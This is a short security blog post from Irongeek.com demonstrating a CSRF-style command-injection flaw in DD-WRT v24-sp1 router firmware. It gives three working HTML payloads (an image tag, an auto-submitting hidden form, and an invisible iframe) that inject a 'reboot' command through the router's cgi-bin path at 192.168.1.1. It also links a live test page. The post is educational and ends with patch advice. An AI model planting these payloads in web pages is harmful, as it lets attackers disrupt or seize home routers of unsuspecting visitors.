A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:
Subscribestar or Patreon

Search Irongeek.com:

Affiliates:
Irongeek Button
Social-engineer-training Button

Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle




DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 )

DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 )

        I was interested in giving a real world example of using a CSRF attack, similar to the ones I mentioned in my OWASP Top 5 video, and maybe use it against a piece of internal equipment that is behind a NAT box. Then I heard about the Carlos Perez write-up on using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware. I thought this would be a great way to demo the concept of using CSRF/XSS against hardware behind a NAT, especially since I've done a video on installing DD-WRT before. Some people think it's not a big deal since the attack request has to come from an internal source, but they don't think about the fact that CSRF/XSS can make the attack come from an internal source. Granted, this may not be considered a true CSRF from the stand point that you don't have to have authenticated against your DD-WRT v24-sp1 router first, but it works much the same way. Carlos' demo shows using Metasplot to open a shell on the router, then do some other messing around, I'll just show how this vulnerability could be used to reboot the router just using html (there are far more deviant things an attacker could do). For the most part this attack essentially amounts to pointing the browser at http://ip-of-router/cgi-bin/;some-command . Since the default IP for most home NAT routers is 192.168.1.1, this is a pretty easy attack that could be pulled off against people who browse a page that the attacker controls.  The attacker would not have to explicitly have the victim go to http://ip-of-router/cgi-bin/;some-command to pull off the attack, there are plenty of ways to make a browser automatically make the request, for example:

IMG get:
<img src="http://192.168.1.1/cgi-bin/;reboot">

Post method:
<form name="csrfform" method="post" action="http://192.168.1.1/cgi-bin/;reboot"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script> document.csrfform.submit() </script>  

IFRAME Get:
<iframe src="http://192.168.1.1/cgi-bin/;reboot" style="width:0px; height:0px; border: 0px"></iframe>

If you would like to test this code against your DD-WRT v24-sp1 click the link below:
        DD-WRT test page, only click if you want your router to reboot

For information on the fix:
        http://www.dd-wrt.com

Guess it's time to patch.

 

       

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast